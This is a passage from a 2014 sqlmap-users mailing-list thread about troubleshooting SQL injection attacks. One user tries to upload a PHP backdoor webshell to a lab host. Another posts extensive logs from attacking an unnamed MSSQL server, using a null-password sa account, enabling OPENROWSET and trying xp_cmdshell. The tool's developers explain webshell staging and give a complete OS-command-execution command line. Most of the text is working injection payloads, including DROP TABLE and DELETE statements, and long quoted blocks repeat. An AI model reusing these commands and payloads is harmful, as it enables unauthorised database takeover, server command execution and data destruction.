> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>54 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>56 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>57 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [INFO] retrieved:
> [03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
> [03:59:07] [WARNING] multi-threading is considered unsafe in time-based data
> retrieval. Going to switch it off automatically
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY
> '0:0:5'--
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY
> '0:0:5'--
> [03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:08] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY
> '0:0:5'--
> [03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:13] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> do you want sqlmap to try to optimize value(s) for DBMS delay responses
> (option '--time-sec')? [Y/n] y
> [04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY
> '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY
> '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [INFO] retrieved: 0
> [04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
> [04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output
> within the back-end file system does not have writing permissions for the
> DBMS process. You are advised to manually adjust it with option --tmp-path
> switch or you will not be able to retrieve the commands output
> [04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating
> system command execution
> [04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and
> press ENTER
> os-shell> x
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 12:02:19
|
On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> wrote: > [...] > All in all, can you please relaunch sqlmap (make sure you run git pull > first to sync to the GitHub repository) with the following syntax: Command line: python sqlmap.py -u "http://172.16.71.138:7879/index.php" --data="act=auth-login&pag=login&username=admin&password=admin" -p username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 --parse-errors -t traffic.log --answers "language does the web server support=4,do you want to use for writable=2,comma separate list of absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" Feel free to report back the result, the entire standard output of sqlmap and send me the traffic.log. Thank you. Bernardo |
|
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 11:57:34
|
Hi Brian, We do use INTO DUMPFILE to write files on the file system when the database is MySQL. This works if stacked queries (nested queries) SQLi technique is supported, which is not the case against a PHP application with MySQL back-end. When stacked queries is not possible and the back-end is MySQL, sqlmap fall-backs to UNION SQLi technique with the same INTO DUMPFILE clause to write the file in the file system. When you instruct sqlmap to takeover the OS and no stacked queries are supported, then if the back-end is MySQL again, it will try to upload a web shell to a writable folder within the web server's document root directory - this is achieved with the technique explained above or, better, with the LINES TERMINATED BY used to terminate the original SQL statement with the file stager injected by sqlmap dumped to the file on the file system and used to upload the web shell. I have checked the Metasploit exploit source code, line 150, and I see it uses the boolean-based SQL injection technique to upload the file - that is not yet supported by sqlmap. We will look into implementing this, I've created a ticket for that, https://github.com/sqlmapproject/sqlmap/issues/647. According to the exploit, the request method is POST so your syntax should reflect that: -u "http://172.16.71.138:7879/index.php" --data="act=auth-login&pag=login&username=admin&password=admin" - not necessarily GET and POST verbs are interchangeable by the application. Also, I notice you provide your own web shell - you can let sqlmap use its own with --os-cmd, --os-shell or --os-pwn. When prompted with a question about the language, stick to PHP, then sqlmap asks what is the writable directory, select 2 and provide your application one, "C:/Progra~1/Cyclope/ni4zlja/" and let sqlmap do its thing. All in all, can you please relaunch sqlmap (make sure you run git pull first to sync to the GitHub repository) with the following syntax: Bernardo On 21 March 2014 09:42, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > --file-write requires union or stacked techniques to be available. In case > of --os-shell we also use INTO OUTFILE technique which is pretty dirty (in > most of cases you can expect original results appearing in the first couple > of lines). Option --file-write in our case should produce a "clean" file > > Kind regards, > Miroslav Stampar > > > On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hu...> wrote: >> >> Hello Everyone, >> >> I'm attempting to use sqlmap to exploit a local installation of some >> software. I know it's vulnerable because it's on exploit-db & metasploit >> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had >> limited success with sqlmap, but I'm at the final stage now where I'm trying >> to use the sqli's I've found to upload a webshell via sqlmap. No >> dice....I'm getting an error stating "[ERROR] none of the SQL injection >> techniques detected can be used to write files to the underlying file system >> of the back-end MySQL server." Other than the obvious, I'm not sure what >> this means because --os-shell and --os-cmd upload a file and execute just >> fine. Does --file-write need something special? Here's the output: >> >> root@kali:/usr/share/sqlmap# sqlmap -u >> "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" >> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> ... >> [*] starting at 23:13:08 >> >> [23:13:08] [DEBUG] cleaning up configuration parameters >> [23:13:08] [DEBUG] setting the HTTP timeout >> [23:13:08] [DEBUG] setting the HTTP method to GET >> [23:13:08] [DEBUG] creating HTTP requests opener object >> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value >> [23:13:08] [DEBUG] setting the write file functionality >> [23:13:08] [INFO] testing connection to the target URL >> [23:13:08] [DEBUG] declared web page charset 'utf-8' >> sqlmap identified the following injection points with a total of 0 HTTP(s) >> requests: >> --- >> Place: GET >> Parameter: username >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND >> 'yVaP'='yVaP&password=admin >> Vector: AND [INFERENCE] >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND >> 'OHln'='OHln&password=admin >> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) >> --- >> [23:13:08] [INFO] testing MySQL >> [23:13:08] [INFO] confirming MySQL >> [23:13:08] [INFO] the back-end DBMS is MySQL >> web server operating system: Windows >> web application technology: PHP 5.3.1, Apache 2.2.14 >> back-end DBMS: MySQL >= 5.0.0 >> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system >> [23:13:08] [INFO] the back-end DBMS operating system is Windows >> [23:13:08] [ERROR] none of the SQL injection techniques detected can be >> used to write files to the underlying file system of the back-end MySQL >> server >> [23:13:08] [INFO] fetched data logged to text files under >> '/usr/share/sqlmap/output/172.16.71.138' >> >> [*] shutting down at 23:13:08 >> >> >> The results are the same when the cmdline is changed up for a POST >> version: >> >> root@kali:/usr/share/sqlm >> Hello Everyone, >> >> I'm attempting to use sqlmap to exploit a local installation of some >> software. I know it's vulnerable because it's on exploit-db & metasploit >> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had >> limited success with sqlmap, but I'm at the final stage now where I'm trying >> to use the sqli's I've found to upload a webshell via sqlmap. No >> dice....I'm getting an error stating "[ERROR] none of the SQL injection >> techniques detected can be used to write files to the underlying file system >> of the back-end MySQL server." Other than the obvious, I'm not sure what >> this means because --os-shell and --os-cmd upload a file and execute just >> fine. Does --file-write need something special? Here's the output: >> >> root@kali:/usr/share/sqlmap# sqlmap -u >> "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" >> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> ... >> [*] starting at 23:13:08 >> >> [23:13:08] [DEBUG] cleaning up configuration parameters >> [23:13:08] [DEBUG] setting the HTTP timeout >> [23:13:08] [DEBUG] setting the HTTP method to GET >> [23:13:08] [DEBUG] creating HTTP requests opener object >> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value >> [23:13:08] [DEBUG] setting the write file functionality >> [23:13:08] [INFO] testing connection to the target URL >> [23:13:08] [DEBUG] declared web page charset 'utf-8' >> sqlmap identified the following injection points with a total of 0 HTTP(s) >> requests: >> --- >> Place: GET >> Parameter: username >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND >> 'yVaP'='yVaP&password=admin >> Vector: AND [INFERENCE] >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND >> 'OHln'='OHln&password=admin >> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) >> --- >> [23:13:08] [INFO] testing MySQL >> [23:13:08] [INFO] confirming MySQL >> [23:13:08] [INFO] the back-end DBMS is MySQL >> web server operating system: Windows >> web application technology: PHP 5.3.1, Apache 2.2.14 >> back-end DBMS: MySQL >= 5.0.0 >> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system >> [23:13:08] [INFO] the back-end DBMS operating system is Windows >> [23:13:08] [ERROR] none of the SQL injection techniques detected can be >> used to write files to the underlying file system of the back-end MySQL >> server >> [23:13:08] [INFO] fetched data logged to text files under >> '/usr/share/sqlmap/output/172.16.71.138' >> >> [*] shutting down at 23:13:08 >> >> >> The results are the same when the cmdline is changed up for a POST >> version: >> >> root@kali:/usr/share/sqlmap# sqlmap -u >> "http://172.16.71.138:7879/index.php" >> --data='act=auth-login&pag=login&username=admin&password=admin' -p >> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> Any thoughts on what may be happening here would be much appreciated. >> >> Thanks, >> >> Brian >> ap# sqlmap -u "http://172.16.71.138:7879/index.php" >> --data='act=auth-login&pag=login&username=admin&password=admin' -p >> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> Any thoughts on what may be happening here would be much appreciated. >> >> Thanks, >> >> Brian >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Miroslav S. <mir...@gm...> - 2014-03-21 09:42:33
|
Hi. --file-write requires union or stacked techniques to be available. In case of --os-shell we also use INTO OUTFILE technique which is pretty dirty (in most of cases you can expect original results appearing in the first couple of lines). Option --file-write in our case should produce a "clean" file Kind regards, Miroslav Stampar On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hu...> wrote: > Hello Everyone, > > I'm attempting to use sqlmap to exploit a local installation of some > software. I know it's vulnerable because it's on exploit-db & metasploit > pops it every time (http://www.exploit-db.com/exploits/20501/). I've had > limited success with sqlmap, but I'm at the final stage now where I'm > trying to use the sqli's I've found to upload a webshell via sqlmap. No > dice....I'm getting an error stating "[ERROR] none of the SQL injection > techniques detected can be used to write files to the underlying file > system of the back-end MySQL server." Other than the obvious, I'm not sure > what this means because --os-shell and --os-cmd upload a file and execute > just fine. Does --file-write need something special? Here's the output: > > root@kali:/usr/share/sqlmap# sqlmap -u " > http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" > -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > ... > [*] starting at 23:13:08 > > [23:13:08] [DEBUG] cleaning up configuration parameters > [23:13:08] [DEBUG] setting the HTTP timeout > [23:13:08] [DEBUG] setting the HTTP method to GET > [23:13:08] [DEBUG] creating HTTP requests opener object > [23:13:08] [DEBUG] forcing back-end DBMS to user defined value > [23:13:08] [DEBUG] setting the write file functionality > [23:13:08] [INFO] testing connection to the target URL > [23:13:08] [DEBUG] declared web page charset 'utf-8' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: username > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND > 'yVaP'='yVaP&password=admin > Vector: AND [INFERENCE] > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND > 'OHln'='OHln&password=admin > Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > --- > [23:13:08] [INFO] testing MySQL > [23:13:08] [INFO] confirming MySQL > [23:13:08] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.1, Apache 2.2.14 > back-end DBMS: MySQL >= 5.0.0 > [23:13:08] [INFO] fingerprinting the back-end DBMS operating system > [23:13:08] [INFO] the back-end DBMS operating system is Windows > [23:13:08] [ERROR] none of the SQL injection techniques detected can be > used to write files to the underlying file system of the back-end MySQL > server > [23:13:08] [INFO] fetched data logged to text files under > '/usr/share/sqlmap/output/172.16.71.138' > > [*] shutting down at 23:13:08 > > > The results are the same when the cmdline is changed up for a POST version: > > root@kali:/usr/share/sqlm > Hello Everyone, > > I'm attempting to use sqlmap to exploit a local installation of some > software. I know it's vulnerable because it's on exploit-db & metasploit > pops it every time (http://www.exploit-db.com/exploits/20501/). I've had > limited success with sqlmap, but I'm at the final stage now where I'm > trying to use the sqli's I've found to upload a webshell via sqlmap. No > dice....I'm getting an error stating "[ERROR] none of the SQL injection > techniques detected can be used to write files to the underlying file > system of the back-end MySQL server." Other than the obvious, I'm not sure > what this means because --os-shell and --os-cmd upload a file and execute > just fine. Does --file-write need something special? Here's the output: > > root@kali:/usr/share/sqlmap# sqlmap -u " > http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" > -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > ... > [*] starting at 23:13:08 > > [23:13:08] [DEBUG] cleaning up configuration parameters > [23:13:08] [DEBUG] setting the HTTP timeout > [23:13:08] [DEBUG] setting the HTTP method to GET > [23:13:08] [DEBUG] creating HTTP requests opener object > [23:13:08] [DEBUG] forcing back-end DBMS to user defined value > [23:13:08] [DEBUG] setting the write file functionality > [23:13:08] [INFO] testing connection to the target URL > [23:13:08] [DEBUG] declared web page charset 'utf-8' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: username > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND > 'yVaP'='yVaP&password=admin > Vector: AND [INFERENCE] > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND > 'OHln'='OHln&password=admin > Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > --- > [23:13:08] [INFO] testing MySQL > [23:13:08] [INFO] confirming MySQL > [23:13:08] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.1, Apache 2.2.14 > back-end DBMS: MySQL >= 5.0.0 > [23:13:08] [INFO] fingerprinting the back-end DBMS operating system > [23:13:08] [INFO] the back-end DBMS operating system is Windows > [23:13:08] [ERROR] none of the SQL injection techniques detected can be > used to write files to the underlying file system of the back-end MySQL > server > [23:13:08] [INFO] fetched data logged to text files under > '/usr/share/sqlmap/output/172.16.71.138' > > [*] shutting down at 23:13:08 > > > The results are the same when the cmdline is changed up for a POST version: > > root@kali:/usr/share/sqlmap# sqlmap -u " > http://172.16.71.138:7879/index.php" > --data='act=auth-login&pag=login&username=admin&password=admin' -p > "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > Any thoughts on what may be happening here would be much appreciated. > > Thanks, > > Brian > ap# sqlmap -u "http://172.16.71.138:7879/index.php" > --data='act=auth-login&pag=login&username=admin&password=admin' -p > "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > Any thoughts on what may be happening here would be much appreciated. > > Thanks, > > Brian > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Daniel S. <don...@gm...> - 2014-03-21 08:09:32
|
hey,
i am trying to write on mssql with either os-shell or any other flag (non
works for me)
i know that 'Ad Hoc Distributed Queries are disabled -> OpenRowSet is
disabled as well
sqlmap initially gets into the db as a secondary user, there are 2 users in
the db, SA which is the administrator and the other user which sqlmap gets
at start
the password for sa is NULL - no password at all, i know that by executing
--users --passwords
so with all this data i am trying to run:
sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o
--os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t
traffic.txt
--sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql
i also tried without the sql-file as i guess sqlmap should try it by itself
but i get the same results
so my guess is the sqlmap can't get into the 'sa' user because if it could
get in, it would enable the openrowset. am i right?
i can send the traffic.txt privately
**********************
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
(7343=7343) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE
'PGJx
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=f'); WAITFOR DELAY '0:0:5'--
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=f') WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[03:57:43] [INFO] executing SQL statements from given file(s)
[03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file
'/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql'
do you want to provide the substitution values? [y/N] y
insert value for variable 'ENABLE': 1
[03:57:46] [DEBUG] executing SQL data execution query: 'EXEC
master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH
OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH
OVERRIDE'
[03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
options', 0; RECONFIGURE WITH OVERRIDE--
[03:57:46] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:57:53] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:57:53] [DEBUG] done
EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH
OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE: 'NULL'
[03:57:53] [DEBUG] going to use D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory
on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by
default. This function is needed to execute statements as another DBMS user
since you provided the option '--dbms-creds'. If you are DBA, you can
enable it. Do you want to enable it? [Y/n] Y
[03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
options', 0; RECONFIGURE WITH OVERRIDE--
[03:59:06] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [INFO] testing if current user is DBA
[03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
(IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1)
THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE
'FSjT
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: Conversion failed when converting the
varchar value 'qsgjq0qywuq' to data type int.'
[03:59:06] [DEBUG] performed 1 queries in 0.13 seconds
[03:59:06] [WARNING] functionality requested probably does not work because
the curent session user is not a database administrator
[03:59:06] [DEBUG] creating a support table to write commands standard
output to
[03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY
IDENTITY, data NVARCHAR(4000))--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable
[03:59:06] [PAYLOAD] f');SELECT * FROM
OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg
VARCHAR(8000);SET
@ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC
master..xp_cmdshell @ktdg')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
because this component is turned off as part of the security configuration
for this server. A system administrator can enable the use of 'Ad Hoc
Distributed Queries' by using sp_configure. For more information about
enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
SQL Server Books Online.'
[03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW',
FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: You do not have permission to use the
bulk load statement.'
[03:59:06] [PAYLOAD] f');SELECT * FROM
OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw
VARCHAR(8000);SET
